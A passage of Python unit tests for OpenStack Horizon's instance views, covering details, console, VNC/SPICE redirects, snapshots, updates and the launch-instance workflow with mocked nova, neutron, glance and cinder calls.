api.network.server_security_groups(IsA(http.HttpRequest), server.id) \
.AndReturn(self.security_groups.first())
self.mox.ReplayAll()
url = reverse('horizon:project:instances:detail',
args=[server.id])
res = self.client.get(url)
self.assertItemsEqual(res.context['instance'].volumes, volumes)
self.assertEqual(res.context['instance'].volumes[0].device,
"/dev/hda")
self.assertEqual(res.context['instance'].volumes[1].device,
"/dev/hdk")
@test.create_stubs({api.nova: ("server_get",
"instance_volumes_list",
"flavor_get"),
api.network: ("server_security_groups",)})
def test_instance_details_metadata(self):
server = self.servers.first()
api.nova.server_get(IsA(http.HttpRequest), server.id).AndReturn(server)
api.nova.instance_volumes_list(IsA(http.HttpRequest),
server.id).AndReturn([])
api.nova.flavor_get(IsA(http.HttpRequest), server.flavor['id']) \
.AndReturn(self.flavors.first())
api.network.server_security_groups(IsA(http.HttpRequest), server.id) \
.AndReturn(self.security_groups.list())
self.mox.ReplayAll()
url = reverse('horizon:project:instances:detail',
args=[server.id])
tg = tabs.InstanceDetailTabs(self.request, instance=server)
qs = "?%s=%s" % (tg.param_name, tg.get_tab("overview").get_id())
res = self.client.get(url + qs)
self.assertContains(res, "<dd>keyName</dd>", 1)
self.assertContains(res, "<dt>someMetaLabel</dt>", 1)
self.assertContains(res, "<dd>someMetaData</dd>", 1)
self.assertContains(res, "<dt>some<b>html</b>label</dt>",
1)
self.assertContains(res, "<dd><!--</dd>", 1)
self.assertContains(res, "<dt>empty</dt>", 1)
self.assertContains(res, "<dd><em>N/A</em></dd>", 1)
@test.create_stubs({api.nova: ('server_console_output',)})
def test_instance_log(self):
server = self.servers.first()
CONSOLE_OUTPUT = 'output'
api.nova.server_console_output(IsA(http.HttpRequest),
server.id, tail_length=None) \
.AndReturn(CONSOLE_OUTPUT)
self.mox.ReplayAll()
url = reverse('horizon:project:instances:console',
args=[server.id])
tg = tabs.InstanceDetailTabs(self.request, instance=server)
qs = "?%s=%s" % (tg.param_name, tg.get_tab("log").get_id())
res = self.client.get(url + qs)
self.assertNoMessages()
self.assertIsInstance(res, http.HttpResponse)
self.assertContains(res, CONSOLE_OUTPUT)
@test.create_stubs({api.nova: ('server_console_output',)})
def test_instance_log_exception(self):
server = self.servers.first()
api.nova.server_console_output(IsA(http.HttpRequest),
server.id, tail_length=None) \
.AndRaise(self.exceptions.nova)
self.mox.ReplayAll()
url = reverse('horizon:project:instances:console',
args=[server.id])
tg = tabs.InstanceDetailTabs(self.request, instance=server)
qs = "?%s=%s" % (tg.param_name, tg.get_tab("log").get_id())
res = self.client.get(url + qs)
self.assertContains(res, "Unable to get log for")
def test_instance_vnc(self):
server = self.servers.first()
CONSOLE_OUTPUT = '/vncserver'
console_mock = self.mox.CreateMock(api.nova.VNCConsole)
console_mock.url = CONSOLE_OUTPUT
self.mox.StubOutWithMock(api.nova, 'server_vnc_console')
self.mox.StubOutWithMock(api.nova, 'server_get')
api.nova.server_get(IsA(http.HttpRequest), server.id) \
.AndReturn(server)
api.nova.server_vnc_console(IgnoreArg(), server.id) \
.AndReturn(console_mock)
self.mox.ReplayAll()
url = reverse('horizon:project:instances:vnc',
args=[server.id])
res = self.client.get(url)
redirect = CONSOLE_OUTPUT + '&title=%s(1)' % server.name
self.assertRedirectsNoFollow(res, redirect)
@test.create_stubs({api.nova: ('server_vnc_console',)})
def test_instance_vnc_exception(self):
server = self.servers.first()
api.nova.server_vnc_console(IsA(http.HttpRequest), server.id) \
.AndRaise(self.exceptions.nova)
self.mox.ReplayAll()
url = reverse('horizon:project:instances:vnc',
args=[server.id])
res = self.client.get(url)
self.assertRedirectsNoFollow(res, INDEX_URL)
def test_instance_spice(self):
server = self.servers.first()
CONSOLE_OUTPUT = '/spiceserver'
console_mock = self.mox.CreateMock(api.nova.SPICEConsole)
console_mock.url = CONSOLE_OUTPUT
self.mox.StubOutWithMock(api.nova, 'server_spice_console')
self.mox.StubOutWithMock(api.nova, 'server_get')
api.nova.server_get(IsA(http.HttpRequest), server.id) \
.AndReturn(server)
api.nova.server_spice_console(IgnoreArg(), server.id) \
.AndReturn(console_mock)
self.mox.ReplayAll()
url = reverse('horizon:project:instances:spice',
args=[server.id])
res = self.client.get(url)
redirect = CONSOLE_OUTPUT + '&title=%s(1)' % server.name
self.assertRedirectsNoFollow(res, redirect)
@test.create_stubs({api.nova: ('server_spice_console',)})
def test_instance_spice_exception(self):
server = self.servers.first()
api.nova.server_spice_console(IsA(http.HttpRequest), server.id) \
.AndRaise(self.exceptions.nova)
self.mox.ReplayAll()
url = reverse('horizon:project:instances:spice',
args=[server.id])
res = self.client.get(url)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs({api.nova: ('server_get',
'snapshot_create',
'server_list',
'flavor_list',
'server_delete'),
cinder: ('volume_snapshot_list',
'volume_list',),
api.glance: ('image_list_detailed',)})
def test_create_instance_snapshot(self):
server = self.servers.first()
api.nova.server_get(IsA(http.HttpRequest), server.id).AndReturn(server)
api.nova.snapshot_create(IsA(http.HttpRequest),
server.id,
"snapshot1").AndReturn(self.snapshots.first())
api.glance.image_list_detailed(IsA(http.HttpRequest),
marker=None).AndReturn([[], False])
cinder.volume_snapshot_list(IsA(http.HttpRequest)).AndReturn([])
cinder.volume_list(IsA(http.HttpRequest)).AndReturn([])
self.mox.ReplayAll()
formData = {'instance_id': server.id,
'method': 'CreateSnapshot',
'name': 'snapshot1'}
url = reverse('horizon:project:images_and_snapshots:snapshots:create',
args=[server.id])
redir_url = reverse('horizon:project:images_and_snapshots:index')
res = self.client.post(url, formData)
self.assertRedirects(res, redir_url)
instance_update_get_stubs = {
api.nova: ('server_get',),
api.network: ('security_group_list',
'server_security_groups',)}
@test.create_stubs(instance_update_get_stubs)
def test_instance_update_get(self):
server = self.servers.first()
api.nova.server_get(IsA(http.HttpRequest), server.id).AndReturn(server)
api.network.security_group_list(IsA(http.HttpRequest)) \
.AndReturn([])
api.network.server_security_groups(IsA(http.HttpRequest),
server.id).AndReturn([])
self.mox.ReplayAll()
url = reverse('horizon:project:instances:update', args=[server.id])
res = self.client.get(url)
self.assertTemplateUsed(res, views.WorkflowView.template_name)
@test.create_stubs(instance_update_get_stubs)
def test_instance_update_get_server_get_exception(self):
server = self.servers.first()
api.nova.server_get(IsA(http.HttpRequest), server.id) \
.AndRaise(self.exceptions.nova)
self.mox.ReplayAll()
url = reverse('horizon:project:instances:update',
args=[server.id])
res = self.client.get(url)
self.assertRedirectsNoFollow(res, INDEX_URL)
def _instance_update_post(self, server_id, server_name, secgroups):
default_role_field_name = 'default_' + \
workflows.update_instance.INSTANCE_SEC_GROUP_SLUG + '_role'
formData = {'name': server_name,
default_role_field_name: 'member',
SEC_GROUP_ROLE_PREFIX + 'member': secgroups}
url = reverse('horizon:project:instances:update',
args=[server_id])
return self.client.post(url, formData)
instance_update_post_stubs = {
api.nova: ('server_get', 'server_update'),
api.network: ('security_group_list',
'server_security_groups',
'server_update_security_groups')}
@test.create_stubs(instance_update_post_stubs)
def test_instance_update_post(self):
server = self.servers.first()
secgroups = self.security_groups.list()[:3]
server_groups = [secgroups[0], secgroups[1]]
wanted_groups = [secgroups[1].id, secgroups[2].id]
api.nova.server_get(IsA(http.HttpRequest), server.id).AndReturn(server)
api.network.security_group_list(IsA(http.HttpRequest)) \
.AndReturn(secgroups)
api.network.server_security_groups(IsA(http.HttpRequest),
server.id).AndReturn(server_groups)
api.nova.server_update(IsA(http.HttpRequest),
server.id,
server.name).AndReturn(server)
api.network.server_update_security_groups(IsA(http.HttpRequest),
server.id,
wanted_groups)
self.mox.ReplayAll()
res = self._instance_update_post(server.id, server.name, wanted_groups)
self.assertNoFormErrors(res)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs(instance_update_post_stubs)
def test_instance_update_post_api_exception(self):
server = self.servers.first()
api.nova.server_get(IsA(http.HttpRequest), server.id).AndReturn(server)
api.network.security_group_list(IsA(http.HttpRequest)) \
.AndReturn([])
api.network.server_security_groups(IsA(http.HttpRequest),
server.id).AndReturn([])
api.nova.server_update(IsA(http.HttpRequest), server.id, server.name) \
.AndRaise(self.exceptions.nova)
api.network.server_update_security_groups(
IsA(http.HttpRequest), server.id, [])
self.mox.ReplayAll()
res = self._instance_update_post(server.id, server.name, [])
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs(instance_update_post_stubs)
def test_instance_update_post_secgroup_api_exception(self):
server = self.servers.first()
api.nova.server_get(IsA(http.HttpRequest), server.id).AndReturn(server)
api.network.security_group_list(IsA(http.HttpRequest)) \
.AndReturn([])
api.network.server_security_groups(IsA(http.HttpRequest),
server.id).AndReturn([])
api.nova.server_update(IsA(http.HttpRequest),
server.id,
server.name).AndReturn(server)
api.network.server_update_security_groups(
IsA(http.HttpRequest),
server.id, []).AndRaise(self.exceptions.nova)
self.mox.ReplayAll()
res = self._instance_update_post(server.id, server.name, [])
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs({api.nova: ('flavor_list',
'keypair_list',
'tenant_absolute_limits',
'availability_zone_list',),
api.network: ('security_group_list',),
cinder: ('volume_snapshot_list',
'volume_list',),
api.neutron: ('network_list',
'profile_list',),
api.glance: ('image_list_detailed',)})
def test_launch_instance_get(self):
image = self.images.first()
cinder.volume_list(IsA(http.HttpRequest)) \
.AndReturn(self.volumes.list())
cinder.volume_snapshot_list(IsA(http.HttpRequest)) \
.AndReturn(self.volumes.list())
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'is_public': True,
'status': 'active'}) \
.AndReturn([self.images.list(), False])
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'property-owner_id': self.tenant.id,
'status': 'active'}) \
.AndReturn([[], False])
api.neutron.network_list(IsA(http.HttpRequest),
tenant_id=self.tenant.id,
shared=False) \
.AndReturn(self.networks.list()[:1])
api.neutron.network_list(IsA(http.HttpRequest),
shared=True) \
.AndReturn(self.networks.list()[1:])
# TODO(absubram): Remove if clause and create separate
# test stubs for when profile_support is being used.
# Additionally ensure those are always run even in default setting
if api.neutron.is_port_profiles_supported():
policy_profiles = self.policy_profiles.list()
api.neutron.profile_list(IsA(http.HttpRequest),
'policy').AndReturn(policy_profiles)
api.nova.tenant_absolute_limits(IsA(http.HttpRequest))\
.AndReturn(self.limits['absolute'])
api.nova.flavor_list(IsA(http.HttpRequest)) \
.AndReturn(self.flavors.list())
api.nova.flavor_list(IsA(http.HttpRequest)) \
.AndReturn(self.flavors.list())
api.nova.keypair_list(IsA(http.HttpRequest)) \
.AndReturn(self.keypairs.list())
api.network.security_group_list(IsA(http.HttpRequest)) \
.AndReturn(self.security_groups.list())
api.nova.availability_zone_list(IsA(http.HttpRequest)) \
.AndReturn(self.availability_zones.list())
self.mox.ReplayAll()
url = reverse('horizon:project:instances:launch')
params = urlencode({"source_type": "image_id",
"source_id": image.id})
res = self.client.get("%s?%s" % (url, params))
workflow = res.context['workflow']
self.assertTemplateUsed(res, views.WorkflowView.template_name)
self.assertEqual(res.context['workflow'].name,
workflows.LaunchInstance.name)
step = workflow.get_step("setinstancedetailsaction")
self.assertEqual(step.action.initial['image_id'], image.id)
self.assertQuerysetEqual(workflow.steps,
['<SetInstanceDetails: setinstancedetailsaction>',
'<SetAccessControls: setaccesscontrolsaction>',
'<SetNetwork: setnetworkaction>',
'<PostCreationStep: customizeaction>'])
@test.create_stubs({api.glance: ('image_list_detailed',),
api.neutron: ('network_list',
'profile_list',
'port_create',),
api.nova: ('flavor_list',
'keypair_list',
'availability_zone_list',
'server_create',),
api.network: ('security_group_list',),
cinder: ('volume_list',
'volume_snapshot_list',),
quotas: ('tenant_quota_usages',)})
def test_launch_instance_post(self):
flavor = self.flavors.first()
image = self.images.first()
keypair = self.keypairs.first()
server = self.servers.first()
sec_group = self.security_groups.first()
avail_zone = self.availability_zones.first()
customization_script = 'user data'
nics = [{"net-id": self.networks.first().id, "v4-fixed-ip": ''}]
quota_usages = self.quota_usages.first()
api.nova.flavor_list(IsA(http.HttpRequest)) \
.AndReturn(self.flavors.list())
api.nova.keypair_list(IsA(http.HttpRequest)) \
.AndReturn(self.keypairs.list())
api.network.security_group_list(IsA(http.HttpRequest)) \
.AndReturn(self.security_groups.list())
api.nova.availability_zone_list(IsA(http.HttpRequest)) \
.AndReturn(self.availability_zones.list())
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'is_public': True,
'status': 'active'}) \
.AndReturn([self.images.list(), False])
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'property-owner_id': self.tenant.id,
'status': 'active'}) \
.AndReturn([[], False])
api.neutron.network_list(IsA(http.HttpRequest),
tenant_id=self.tenant.id,
shared=False) \
.AndReturn(self.networks.list()[:1])
api.neutron.network_list(IsA(http.HttpRequest),
shared=True) \
.AndReturn(self.networks.list()[1:])
# TODO(absubram): Remove if clause and create separate
# test stubs for when profile_support is being used.
# Additionally ensure those are always run even in default setting
if api.neutron.is_port_profiles_supported():
policy_profiles = self.policy_profiles.list()
policy_profile_id = self.policy_profiles.first().id
port = self.ports.first()
api.neutron.profile_list(
IsA(http.HttpRequest),
'policy').AndReturn(policy_profiles)
api.neutron.port_create(
IsA(http.HttpRequest),
network_id=self.networks.first().id,
policy_profile_id=policy_profile_id).AndReturn(port)
cinder.volume_list(IsA(http.HttpRequest)) \
.AndReturn([])
cinder.volume_snapshot_list(IsA(http.HttpRequest)).AndReturn([])
api.nova.server_create(IsA(http.HttpRequest),
server.name,
image.id,
flavor.id,
keypair.name,
customization_script,
[sec_group.name],
block_device_mapping=None,
block_device_mapping_v2=None,
nics=nics,
availability_zone=avail_zone.zoneName,
instance_count=IsA(int),
admin_pass=u'')
quotas.tenant_quota_usages(IsA(http.HttpRequest)) \
.AndReturn(quota_usages)
self.mox.ReplayAll()
form_data = {'flavor': flavor.id,
'source_type': 'image_id',
'image_id': image.id,
'keypair': keypair.name,
'name': server.name,
'customization_script': customization_script,
'project_id': self.tenants.first().id,
'user_id': self.user.id,
'groups': sec_group.name,
'availability_zone': avail_zone.zoneName,
'volume_type': '',
'network': self.networks.first().id,
'count': 1}
url = reverse('horizon:project:instances:launch')
res = self.client.post(url, form_data)
self.assertNoFormErrors(res)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs({api.glance: ('image_list_detailed',),
api.neutron: ('network_list',
'profile_list',),
api.nova: ('flavor_list',
'keypair_list',
'availability_zone_list',
'server_create',),
api.network: ('security_group_list',),
cinder: ('volume_list',
'volume_snapshot_list',),
quotas: ('tenant_quota_usages',)})
def test_launch_instance_post_boot_from_volume(self):
flavor = self.flavors.first()
keypair = self.keypairs.first()
server = self.servers.first()
volume = self.volumes.first()
sec_group = self.security_groups.first()
avail_zone = self.availability_zones.first()
customization_script = 'user data'
device_name = u'vda'
volume_choice = "%s:vol" % volume.id
block_device_mapping = {device_name: u"%s::0" % volume_choice}
nics = [{"net-id": self.networks.first().id, "v4-fixed-ip": ''}]
quota_usages = self.quota_usages.first()
api.nova.flavor_list(IsA(http.HttpRequest)) \
.AndReturn(self.flavors.list())
api.nova.keypair_list(IsA(http.HttpRequest)) \
.AndReturn(self.keypairs.list())
api.network.security_group_list(IsA(http.HttpRequest)) \
.AndReturn(self.security_groups.list())
api.nova.availability_zone_list(IsA(http.HttpRequest)) \
.AndReturn(self.availability_zones.list())
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'is_public': True,
'status': 'active'}) \
.AndReturn([self.images.list(), False])
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'property-owner_id': self.tenant.id,
'status': 'active'}) \
.AndReturn([[], False])
api.neutron.network_list(IsA(http.HttpRequest),
tenant_id=self.tenant.id,
shared=False) \
.AndReturn(self.networks.list()[:1])
api.neutron.network_list(IsA(http.HttpRequest),
shared=True) \
.AndReturn(self.networks.list()[1:])
# TODO(absubram): Remove if clause and create separate
# test stubs for when profile_support is being used.
# Additionally ensure those are always run even in default setting
if api.neutron.is_port_profiles_supported():
policy_profiles = self.policy_profiles.list()
policy_profile_id = self.policy_profiles.first().id
port = self.ports.first()
api.neutron.profile_list(
IsA(http.HttpRequest),
'policy').AndReturn(policy_profiles)
api.neutron.port_create(
IsA(http.HttpRequest),
network_id=self.networks.first().id,
policy_profile_id=policy_profile_id).AndReturn(port)
nics = [{"port-id": port.id}]
cinder.volume_list(IsA(http.HttpRequest)) \
.AndReturn(self.volumes.list())
cinder.volume_snapshot_list(IsA(http.HttpRequest)).AndReturn([])
api.nova.server_create(IsA(http.HttpRequest),
server.name,
'',
flavor.id,
keypair.name,
customization_script,
[sec_group.name],
block_device_mapping=block_device_mapping,
block_device_mapping_v2=None,
nics=nics,
availability_zone=avail_zone.zoneName,
instance_count=IsA(int),
admin_pass=u'')
quotas.tenant_quota_usages(IsA(http.HttpRequest)) \
.AndReturn(quota_usages)
self.mox.ReplayAll()
form_data = {'flavor': flavor.id,
'source_type': 'volume_id',
'source_id': volume_choice,
'keypair': keypair.name,
'name': server.name,
'customization_script': customization_script,
'project_id': self.tenants.first().id,
'user_id': self.user.id,
'groups': sec_group.name,
'availability_zone': avail_zone.zoneName,
'volume_size': '1',
'volume_id': volume_choice,
'device_name': device_name,
'network': self.networks.first().id,
'count': 1}
url = reverse('horizon:project:instances:launch')
res = self.client.post(url, form_data)
self.assertNoFormErrors(res)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs({api.glance: ('image_list_detailed',),
api.neutron: ('network_list',
'profile_list',
'port_create'),
api.nova: ('server_create',
'flavor_list',
'keypair_list',
'availability_zone_list',
'tenant_absolute_limits',),
api.network: ('security_group_list',),
cinder: ('volume_list',
'volume_snapshot_list',),
quotas: ('tenant_quota_usages',)})
def test_launch_instance_post_no_images_available_boot_from_volume(self):
flavor = self.flavors.first()
keypair = self.keypairs.first()
server = self.servers.first()
volume = self.volumes.first()
sec_group = self.security_groups.first()
avail_zone = self.availability_zones.first()
customization_script = 'user data'
device_name = u'vda'
volume_choice = "%s:vol" % volume.id
block_device_mapping = {device_name: u"%s::0" % volume_choice}
nics = [{"net-id": self.networks.first().id, "v4-fixed-ip": ''}]
quota_usages = self.quota_usages.first()
api.nova.flavor_list(IsA(http.HttpRequest)) \
.AndReturn(self.flavors.list())
api.nova.keypair_list(IsA(http.HttpRequest)) \
.AndReturn(self.keypairs.list())
api.network.security_group_list(IsA(http.HttpRequest)) \
.AndReturn(self.security_groups.list())
api.nova.availability_zone_list(IsA(http.HttpRequest)) \
.AndReturn(self.availability_zones.list())
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'is_public': True,
'status': 'active'}) \
.AndReturn([self.images.list(), False])
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'property-owner_id': self.tenant.id,
'status': 'active'}) \
.AndReturn([[], False])
api.neutron.network_list(IsA(http.HttpRequest),
tenant_id=self.tenant.id,
shared=False) \
.AndReturn(self.networks.list()[:1])
api.neutron.network_list(IsA(http.HttpRequest),
shared=True) \
.AndReturn(self.networks.list()[1:])
# TODO(absubram): Remove if clause and create separate
# test stubs for when profile_support is being used.
# Additionally ensure those are always run even in default setting
if api.neutron.is_port_profiles_supported():
policy_profiles = self.policy_profiles.list()
policy_profile_id = self.policy_profiles.first().id
port = self.ports.first()
api.neutron.profile_list(
IsA(http.HttpRequest),
'policy').AndReturn(policy_profiles)
api.neutron.port_create(
IsA(http.HttpRequest),
network_id=self.networks.first().id,
policy_profile_id=policy_profile_id).AndReturn(port)
nics = [{"port-id": port.id}]
cinder.volume_list(IsA(http.HttpRequest)) \
.AndReturn(self.volumes.list())
cinder.volume_snapshot_list(IsA(http.HttpRequest)).AndReturn([])
quotas.tenant_quota_usages(IsA(http.HttpRequest)) \
.AndReturn(quota_usages)
api.nova.server_create(IsA(http.HttpRequest),
server.name,
'',
flavor.id,
keypair.name,
customization_script,
[sec_group.name],
block_device_mapping=block_device_mapping,
block_device_mapping_v2=None,
nics=nics,
availability_zone=avail_zone.zoneName,
instance_count=IsA(int),
admin_pass=u'')
self.mox.ReplayAll()
form_data = {'flavor': flavor.id,
'source_type': 'volume_id',
#'image_id': '',
'keypair': keypair.name,
'name': server.name,
'customization_script': customization_script,
'project_id': self.tenants.first().id,
'user_id': self.user.id,
'groups': sec_group.name,
'availability_zone': avail_zone.zoneName,
'network': self.networks.first().id,
'volume_type': 'volume_id',
'volume_id': volume_choice,
'device_name': device_name,
'count': 1}
url = reverse('horizon:project:instances:launch')
res = self.client.post(url, form_data)
self.assertNoFormErrors(res)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs({api.glance: ('image_list_detailed',),
api.neutron: ('network_list',
'profile_list',),
api.nova: ('flavor_list',
'keypair_list',
'availability_zone_list',
'tenant_absolute_limits',),
api.network: ('security_group_list',),
cinder: ('volume_list',
'volume_snapshot_list',),
quotas: ('tenant_quota_usages',)})
def test_launch_instance_post_no_images_available(self):
flavor = self.flavors.first()
keypair = self.keypairs.first()
server = self.servers.first()
sec_group = self.security_groups.first()
avail_zone = self.availability_zones.first()
customization_script = 'user data'
quota_usages = self.quota_usages.first()
api.nova.flavor_list(IsA(http.HttpRequest)) \
.AndReturn(self.flavors.list())
api.nova.tenant_absolute_limits(IsA(http.HttpRequest)) \
.AndReturn(self.limits['absolute'])
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'is_public': True,
'status': 'active'}) \
.AndReturn([[], False])
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'property-owner_id': self.tenant.id,
'status': 'active'}) \
.AndReturn([[], False])
api.neutron.network_list(IsA(http.HttpRequest),
tenant_id=self.tenant.id,
shared=False) \
.AndReturn(self.networks.list()[:1])
api.neutron.network_list(IsA(http.HttpRequest),
shared=True) \
.AndReturn(self.networks.list()[1:])
# TODO(absubram): Remove if clause and create separate
# test stubs for when profile_support is being used.
# Additionally ensure those are always run even in default setting
if api.neutron.is_port_profiles_supported():
policy_profiles = self.policy_profiles.list()
api.neutron.profile_list(IsA(http.HttpRequest),
'policy').AndReturn(policy_profiles)
api.nova.flavor_list(IsA(http.HttpRequest)) \
.AndReturn(self.flavors.list())
api.nova.keypair_list(IsA(http.HttpRequest)) \
.AndReturn(self.keypairs.list())
api.network.security_group_list(IsA(http.HttpRequest)) \
.AndReturn(self.security_groups.list())
api.nova.availability_zone_list(IsA(http.HttpRequest)) \
.AndReturn(self.availability_zones.list())
cinder.volume_list(IsA(http.HttpRequest)) \
.AndReturn([])
cinder.volume_snapshot_list(IsA(http.HttpRequest)).AndReturn([])
quotas.tenant_quota_usages(IsA(http.HttpRequest)) \
.AndReturn(quota_usages)
self.mox.ReplayAll()
form_data = {'flavor': flavor.id,
'source_type': 'image_id',
'image_id': '',
'keypair': keypair.name,
'name': server.name,
'customization_script': customization_script,
'project_id': self.tenants.first().id,
'user_id': self.user.id,
'groups': sec_group.name,
'availability_zone': avail_zone.zoneName,
'volume_type': '',
'count': 1}
url = reverse('horizon:project:instances:launch')
res = self.client.post(url, form_data)
self.assertFormErrors(res, 1, "You must select an image.")
self.assertTemplateUsed(res, views.WorkflowView.template_name)
@test.create_stubs({api.glance: ('image_list_detailed',),
api.neutron: ('network_list',
'profile_list',),
cinder: ('volume_list',
'volume_snapshot_list',),
api.network: ('security_group_list',),
api.nova: ('flavor_list',
'keypair_list',
'tenant_absolute_limits',
'availability_zone_list',)})
def test_launch_flavorlist_error(self):
cinder.volume_list(IsA(http.HttpRequest)) \
.AndReturn(self.volumes.list())
cinder.volume_snapshot_list(IsA(http.HttpRequest)) \
.AndReturn(self.volumes.list())
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'is_public': True,
'status': 'active'}) \
.AndReturn([self.images.list(), False])
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'property-owner_id': self.tenant.id,
'status': 'active'}) \
.AndReturn([[], False])
api.neutron.network_list(IsA(http.HttpRequest),
tenant_id=self.tenant.id,
shared=False) \
.AndReturn(self.networks.list()[:1])
api.neutron.network_list(IsA(http.HttpRequest),
shared=True) \
.AndReturn(self.networks.list()[1:])
# TODO(absubram): Remove if clause and create separate
# test stubs for when profile_support is being used.
# Additionally ensure those are always run even in default setting
if api.neutron.is_port_profiles_supported():
policy_profiles = self.policy_profiles.list()
api.neutron.profile_list(IsA(http.HttpRequest),
'policy').AndReturn(policy_profiles)
api.nova.tenant_absolute_limits(IsA(http.HttpRequest)) \
.AndReturn(self.limits['absolute'])
api.nova.flavor_list(IsA(http.HttpRequest)) \
.AndRaise(self.exceptions.nova)
api.nova.flavor_list(IsA(http.HttpRequest)) \
.AndRaise(self.exceptions.nova)
api.nova.keypair_list(IsA(http.HttpRequest)) \
.AndReturn(self.keypairs.list())
api.network.security_group_list(IsA(http.HttpRequest)) \
.AndReturn(self.security_groups.list())
api.nova.availability_zone_list(IsA(http.HttpRequest)) \
.AndReturn(self.availability_zones.list())
self.mox.ReplayAll()
url = reverse('horizon:project:instances:launch')
res = self.client.get(url)
self.assertTemplateUsed(res, views.WorkflowView.template_name)
@test.create_stubs({api.glance: ('image_list_detailed',),
api.neutron: ('network_list',
'profile_list',
'port_create',),
api.nova: ('flavor_list',
'keypair_list',
'availability_zone_list',
'server_create',),
api.network: ('security_group_list',),
cinder: ('volume_list',
'volume_snapshot_list',),
quotas: ('tenant_quota_usages',)})
def test_launch_form_keystone_exception(self):
flavor = self.flavors.first()
image = self.images.first()
keypair = self.keypairs.first()
server = self.servers.first()
sec_group = self.security_groups.first()
avail_zone = self.availability_zones.first()
customization_script = 'userData'
nics = [{"net-id": self.networks.first().id, "v4-fixed-ip": ''}]
quota_usages = self.quota_usages.first()
cinder.volume_snapshot_list(IsA(http.HttpRequest)) \
.AndReturn(self.volumes.list())
api.nova.flavor_list(IgnoreArg()).AndReturn(self.flavors.list())
api.nova.keypair_list(IgnoreArg()).AndReturn(self.keypairs.list())
api.network.security_group_list(IsA(http.HttpRequest)) \
.AndReturn(self.security_groups.list())
api.nova.availability_zone_list(IsA(http.HttpRequest)) \
.AndReturn(self.availability_zones.list())
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'is_public': True,
'status': 'active'}) \
.AndReturn([self.images.list(), False])
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'property-owner_id': self.tenant.id,
'status': 'active'}) \
.AndReturn([[], False])
api.neutron.network_list(IsA(http.HttpRequest),
tenant_id=self.tenant.id,
shared=False) \
.AndReturn(self.networks.list()[:1])
api.neutron.network_list(IsA(http.HttpRequest),
shared=True) \
.AndReturn(self.networks.list()[1:])
# TODO(absubram): Remove if clause and create separate
# test stubs for when profile_support is being used.
# Additionally ensure those are always run even in default setting
if api.neutron.is_port_profiles_supported():
policy_profiles = self.policy_profiles.list()
policy_profile_id = self.policy_profiles.first().id
port = self.ports.first()
api.neutron.profile_list(
IsA(http.HttpRequest),
'policy').AndReturn(policy_profiles)
api.neutron.port_create(
IsA(http.HttpRequest),
network_id=self.networks.first().id,
policy_profile_id=policy_profile_id).AndReturn(port)
nics = [{"port-id": port.id}]
cinder.volume_list(IgnoreArg()).AndReturn(self.volumes.list())
api.nova.server_create(IsA(http.HttpRequest),
server.name,
image.id,
flavor.id,
keypair.name,
customization_script,
[sec_group.name],
block_device_mapping=None,
block_device_mapping_v2=None,
nics=nics,
availability_zone=avail_zone.zoneName,
instance_count=IsA(int),
admin_pass='password') \
.AndRaise(self.exceptions.keystone)
quotas.tenant_quota_usages(IsA(http.HttpRequest)) \
.AndReturn(quota_usages)
self.mox.ReplayAll()
form_data = {'flavor': flavor.id,
'source_type': 'image_id',
'source_id': image.id,
'volume_size': '1',
'image_id': image.id,
'availability_zone': avail_zone.zoneName,
'keypair': keypair.name,
'name': server.name,
'customization_script': customization_script,
'project_id': self.tenants.first().id,
'user_id': self.user.id,
'groups': sec_group.name,
'volume_type': '',
'network': self.networks.first().id,
'count': 1,
'admin_pass': 'password',
'confirm_admin_pass': 'password'}
url = reverse('horizon:project:instances:launch')
res = self.client.post(url, form_data)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs({api.glance: ('image_list_detailed',),
api.neutron: ('network_list',
'profile_list',),
api.nova: ('flavor_list',
'keypair_list',
'tenant_absolute_limits',
'availability_zone_list',),
api.network: ('security_group_list',),
cinder: ('volume_list',
'volume_snapshot_list',),
quotas: ('tenant_quota_usages',)})
def test_launch_form_instance_count_error(self):
flavor = self.flavors.first()
image = self.images.first()
keypair = self.keypairs.first()
server = self.servers.first()
volume = self.volumes.first()
sec_group = self.security_groups.first()
avail_zone = self.availability_zones.first()
customization_script = 'user data'
device_name = u'vda'
volume_choice = "%s:vol" % volume.id
quota_usages = self.quota_usages.first()
api.nova.flavor_list(IsA(http.HttpRequest)) \
.AndReturn(self.flavors.list())
api.nova.keypair_list(IsA(http.HttpRequest)) \
.AndReturn(self.keypairs.list())
api.network.security_group_list(IsA(http.HttpRequest)) \
.AndReturn(self.security_groups.list())
api.nova.availability_zone_list(IsA(http.HttpRequest)) \
.AndReturn(self.availability_zones.list())
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'is_public': True,
'status': 'active'}) \
.AndReturn([self.images.list(), False])
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'property-owner_id': self.tenant.id,
'status': 'active'}) \
.AndReturn([[], False])
api.neutron.network_list(IsA(http.HttpRequest),
tenant_id=self.tenant.id,
shared=False) \
.AndReturn(self.networks.list()[:1])
api.neutron.network_list(IsA(http.HttpRequest),
shared=True) \
.AndReturn(self.networks.list()[1:])
# TODO(absubram): Remove if clause and create separate
# test stubs for when profile_support is being used.
# Additionally ensure those are always run even in default setting
if api.neutron.is_port_profiles_supported():
policy_profiles = self.policy_profiles.list()
api.neutron.profile_list(IsA(http.HttpRequest),
'policy').AndReturn(policy_profiles)
